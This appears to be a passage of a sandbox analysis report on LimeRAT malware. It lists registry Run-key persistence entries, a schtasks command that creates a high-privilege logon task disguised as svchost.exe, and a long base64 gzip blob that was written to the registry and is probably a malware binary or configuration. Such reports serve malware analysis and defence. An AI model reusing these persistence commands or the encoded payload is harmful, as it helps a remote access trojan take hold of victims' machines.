reg_key	HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\helps	reg_value	"C:\Users\test22\AppData\Local\Temp\helps.vbs"
reg_key	HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\helps	reg_value	"C:\Users\test22\AppData\Local\Temp\helps.vbs"
reg_key	HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\helps	reg_value	"C:\Users\test22\AppData\Local\Temp\helps.vbs"
reg_key	HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\helps	reg_value	"C:\Users\test22\AppData\Local\Temp\helps.vbs"
reg_key	HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\helps	reg_value	"C:\Users\test22\AppData\Local\Temp\helps.vbs"
reg_key	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\Microsoft Manager	reg_value	C:\Windows (x86)\explorer.exe
cmdline	schtasks /create /f /sc ONLOGON /RL HIGHEST /tn LimeRAT-Admin /tr "'C:\Users\test22\AppData\Roaming\MicrosoftData\svchost.exe'"

Creates or sets a registry key to a long series of bytes, possibly to store a binary or malware config (1 event)

Time & API	Arguments	Status	Return	Repeated
RegSetValueExW April 12, 2021, 10:41 a.m.	key_handle: 0x000002d8 regkey_r: _PIN reg_type: 1 (REG_SZ) value: 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